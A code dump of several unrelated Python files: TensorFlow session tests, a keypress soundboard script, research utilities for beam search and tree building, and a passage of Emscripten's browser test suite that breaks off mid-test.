self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session():
for dtype in [dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
out_t.eval(feed_dict={feed_t: np_array}))
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
RuntimeError,
'No session factory registered for the given session options.'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"):
sess.run(a, feed_dict={'a': [2.0]})
if __name__ == '__main__':
googletest.main()
|
soundboard.py
|
import threading
from pynput import keyboard
from playsound import playsound
BATZ = './batz.m4a'
BLJAD = './bljad.m4a'
SHESH = './shesh.m4a'
OH_SHIT = './oh_shit.m4a'
def play_sound(sound_name):
playsound(sound_name)
def on_press(key):
try:
if key == keyboard.Key.space:
threading.Thread(target=play_sound, args=(BLJAD,)).start()
elif key == keyboard.Key.backspace:
threading.Thread(target=play_sound, args=(OH_SHIT,)).start()
elif key == keyboard.Key.shift_l or key == keyboard.Key.shift_r:
threading.Thread(target=play_sound, args=(SHESH,)).start()
else:
threading.Thread(target=play_sound, args=(BATZ,)).start()
except AttributeError:
threading.Thread(target=play_sound, args=(BLJAD,)).start()
def on_release(key):
if key == keyboard.Key.esc:
# Stop listener
return False
# Collect events until released
with keyboard.Listener(
on_press=on_press,
on_release=on_release
) as listener:
listener.join()
|
utils.py
|
import numpy as np
import keras
import keras.backend as K
import heapq
import copy
from multiprocessing import Pool, Process, SimpleQueue, Pipe
import dgl
import networkx as nx
inf = 1e10
class Multiprocessing:
@staticmethod
def work(fun, child_conn, args):
ret = fun(args[0], child_conn, args[2])
child_conn.send(("close", ret))
@staticmethod
def mapping(fun, args_list, processes, partial_to_loss):
ans = [None] * len(args_list)
pipes = []
for batch_start in range(0, len(args_list), processes):
ps = []
for i in range(batch_start, min(batch_start + processes, len(args_list))):
parent_conn, child_conn = Pipe()
pipes.append(parent_conn)
p = Process(target=Multiprocessing.work, args=(fun, child_conn, args_list[i]))
p.start()
ps.append(p)
unfinished = len(ps)
while unfinished > 0:
for i in range(batch_start, min(batch_start + processes, len(args_list))):
if pipes[i] is not None:
s = pipes[i].recv()
if len(s) == 2 and s[0] == "close":
ans[i] = s[1]
pipes[i] = None
unfinished -= 1
else:
pipes[i].send(partial_to_loss(s, args_list[i][1]))
for p in ps:
p.join()
return ans
class MultiprocessingWithoutPipe:
@staticmethod
def work(fun, num, q, args):
np.random.seed(num)
ret = fun(*args)
q.put((num, ret))
@staticmethod
def mapping(fun, args_list, processes):
ans = [None] * len(args_list)
q = SimpleQueue()
for batch_start in range(0, len(args_list), processes):
ps = []
for i in range(batch_start, min(batch_start + processes, len(args_list))):
p = Process(target=MultiprocessingWithoutPipe.work, args=(fun, i, q, args_list[i]))
p.start()
ps.append(p)
while not q.empty():
num, ret = q.get()
ans[num] = ret
for p in ps:
p.join()
while not q.empty():
num, ret = q.get()
ans[num] = ret
return ans
class Gradient(keras.layers.Layer):
def __init__(self, y, **kwargs):
super(Gradient, self).__init__(**kwargs)
self.y = y
def build(self, input_shape):
# Create a trainable weight variable for this layer.
super(Gradient, self).build(input_shape) # Be sure to call this at the end
def call(self, x, **kwargs):
return K.gradients(self.y, x)[0]
def compute_output_shape(self, input_shape):
return input_shape
def tuple_set_union(ret0: tuple, ret1: tuple):
if ret0 is None:
return ret1
if ret1 is None:
return ret0
ret = ()
max_len = max(len(ret0), len(ret1))
for i in range(max_len):
if i >= len(ret0):
r0 = [""]
else:
r0 = ret0[i]
if i >= len(ret1):
r1 = [""]
else:
r1 = ret1[i]
ret += (tuple(set(r0).union(set(r1))),)
return ret
class Beam:
def __init__(self, budget):
'''
The queue are contain two elements: (data, score), while the score is the ranking key (descending)
:param budget: the beam search budget
'''
self.budget = budget
self.queue = []
self.in_queue = {}
def add(self, data, score):
'''
add (data, score) into queue
:param data: candidate
:param score: score of the candidate
:return: True if added in, False otherwise
'''
if data in self.in_queue: # if data is ready in the priority queue, we update the score in self.in_queue
if self.in_queue[data] < score:
self.in_queue[data] = score
return True
return False
ret = True
if len(self.queue) == self.budget: # if size(queue) == budget, we need to remove one
while True:
a, b = heapq.heappop(self.queue)
# the top of the priority queue may not be smallest, because it may contain new value in self.in_queue
if a == self.in_queue[b]: # if the value is not updated, then it is smallest
break # remove (a, b)
else:
heapq.heappush(self.queue,
(self.in_queue[b], b)) # otherwise, update in the priority queue (lazily)
del self.in_queue[b] # remove (a, b) from self.in_queue
if a > score: # if the old (a, b) is better then new (score, data), we replace (score, data) with (a, b)
score, data = a, b
ret = False
heapq.heappush(self.queue, (score, data)) # add (score, data)
self.in_queue[data] = score # update in self.in_queue
return ret
def extend(self, others):
if isinstance(others, list):
for data, score in others:
self.add(data, score)
else:
assert False
# for data, score in others.queue:
# self.add(data, score)
def check_balance(self):
ret = []
for data in self.in_queue:
ret.append((data, self.in_queue[data]))
ret.sort(key=lambda x: -x[1])
return ret
def is_same(self, others: list):
if len(others) != len(self.queue):
return False
others.sort(key=lambda x: -x[1])
for i in range(len(others)):
data, score = others[i]
if data not in self.in_queue or self.in_queue[data] != score:
return False
return True
class UnorderedBeam:
def __init__(self, budget):
self.budget = budget
self.queue = []
def add(self, data):
self.queue.append(data)
def extend(self, others):
if isinstance(others, list):
self.queue.extend(others)
else:
assert False
# for data, score in others.queue:
# self.add(data, score)
def check_balance(self):
ids = np.random.randint(0, len(self.queue), self.budget)
ret = []
for id in ids:
ret.append(self.queue[id])
return ret
class Dict:
def __init__(self, char2id):
self.char2id = char2id
self.id2char = [" "] * len(char2id)
for c in char2id:
self.id2char[char2id[c]] = c
def to_string(self, ids):
return "".join([self.id2char[x] for x in ids])
def to_ids(self, s):
return np.array([self.char2id[c] for c in s])
def swap_pytorch(x, p1, p2):
z = x[p1].clone()
x[p1] = x[p2]
x[p2] = z
def compute_adjacent_keys(dict_map):
lines = open("./dataset/en.key").readlines()
adjacent_keys = [[] for i in range(len(dict_map))]
for line in lines:
tmp = line.strip().split()
ret = set(tmp[1:]).intersection(dict_map.keys())
ids = []
for x in ret:
ids.append(dict_map[x])
adjacent_keys[dict_map[tmp[0]]].extend(ids)
return adjacent_keys
def cons_tree(x, phi, f, old_tree, vocab):
PAD_WORD = -1
g = nx.DiGraph()
old_xid = old_tree.ndata['x'].tolist()
cnt = 0
map_old_xid_x_id = [None] * len(old_xid)
for i, id in enumerate(old_xid):
if id != PAD_WORD: # PAD_WORD
map_old_xid_x_id[i] = cnt
cnt += 1
assert cnt == len(x) # sanity check
def _rec_build(old_u):
in_nodes = old_tree.in_edges(old_u)[0]
sub_trees = []
for node in in_nodes:
node = int(node)
if old_tree.in_degrees(node) == 0:
# leaf node
cid = g.number_of_nodes()
id = map_old_xid_x_id[node]
if phi[id] == 0:
word = vocab.get(x[id], PAD_WORD)
elif phi[id] == 1:
continue
elif phi[id] == 2:
left = cid + 1
right = cid + 2
word = vocab.get(x[id], PAD_WORD)
g.add_node(cid, x=PAD_WORD, y=int(old_tree.ndata['y'][node]),
mask=0) # we duplicate the y label
g.add_node(left, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
g.add_node(right, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
g.add_edge(left, cid)
g.add_edge(right, cid)
sub_trees.append(cid)
continue
elif phi[id] == 3:
word = vocab.get(f[id], PAD_WORD)
else:
raise NotImplementedError
g.add_node(cid, x=word, y=int(old_tree.ndata['y'][node]), mask=1)
sub_trees.append(cid)
else:
sub_tree = _rec_build(node)
if sub_tree is not None:
sub_trees.append(sub_tree)
if len(sub_trees) == 0:
return None
elif len(sub_trees) == 1:
return sub_trees[0]
else:
assert len(sub_trees) == 2 # sanity check
nid = g.number_of_nodes()
g.add_node(nid, x=PAD_WORD, y=int(old_tree.ndata['y'][old_u]), mask=0)
for cid in sub_trees:
g.add_edge(cid, nid)
return nid
# add root
root = _rec_build(0)
g.add_node(root, x=PAD_WORD, y=int(old_tree.ndata['y'][0]), mask=0)
assert old_tree.out_degrees(0) == 0 # sanity check
return dgl.from_networkx(g, node_attrs=['x', 'y', 'mask'])
|
test_browser.py
|
import BaseHTTPServer, multiprocessing, os, shutil, subprocess, unittest, zlib, webbrowser, time, shlex
from runner import BrowserCore, path_from_root
from tools.shared import *
# User can specify an environment variable EMSCRIPTEN_BROWSER to force the browser test suite to
# run using another browser command line than the default system browser.
emscripten_browser = os.environ.get('EMSCRIPTEN_BROWSER')
if emscripten_browser:
cmd = shlex.split(emscripten_browser)
def run_in_other_browser(url):
Popen(cmd + [url])
if EM_BUILD_VERBOSE_LEVEL >= 3:
print >> sys.stderr, "using Emscripten browser: " + str(cmd)
webbrowser.open_new = run_in_other_browser
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum):
class ChunkedServerHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:8888")
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
(start, end) = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data)-1, end)
length = end-start+1
s.sendheaders([],length)
s.wfile.write(data[start:end+1])
s.wfile.close()
expectedConns = 11
httpd = BaseHTTPServer.HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns+1):
httpd.handle_request()
class browser(BrowserCore):
@classmethod
def setUpClass(self):
super(browser, self).setUpClass()
self.browser_timeout = 20
print
print 'Running the browser tests. Make sure the browser allows popups from localhost.'
print
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1']) # is the default anyhow
def test_html_source_map(self):
cpp_file = os.path.join(self.get_dir(), 'src.cpp')
html_file = os.path.join(self.get_dir(), 'src.html')
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'src.html', '-g4'],
cwd=self.get_dir()).communicate()
assert os.path.exists(html_file)
assert os.path.exists(html_file + '.map')
webbrowser.open_new('file://' + html_file)
time.sleep(1)
print '''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step through and see the print (best to run with EM_SAVE_DIR=1 for the reload).
'''
def test_emscripten_log(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
Popen([PYTHON, EMCC, src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1']).communicate()
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK): return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
if WINDOWS and Building.which('mingw32-make'): # On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
Popen(['doit.bat']).communicate()
else:
Popen(['sh', './doit.sh']).communicate()
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
def make_main(path):
print 'make main at', path
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT();
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print 'Testing', srcpath, dstpath
make_main(dstpath)
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete(self.in_dir('assets'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/').replace('\\', '/'))
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset1/.git').replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs(os.path.join(self.get_dir(), 'assets/sub/asset2/').replace('\\', '/'))
open(os.path.join(self.get_dir(), 'assets/sub/asset1/file1.txt'), 'w').write('''load me right before running the code please''')
open(os.path.join(self.get_dir(), 'assets/sub/asset1/.git/shouldnt_be_embedded.txt'), 'w').write('''this file should not get embedded''')
open(os.path.join(self.get_dir(), 'assets/sub/asset2/file2.txt'), 'w').write('''load me right before running the code please''')
absolute_assets_src_path = os.path.join(self.get_dir(), 'assets').replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT();
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print srcpath
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
except:
pass
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--preload-file', absolute_src_path, '-o', 'dirrey/page.html']).communicate()
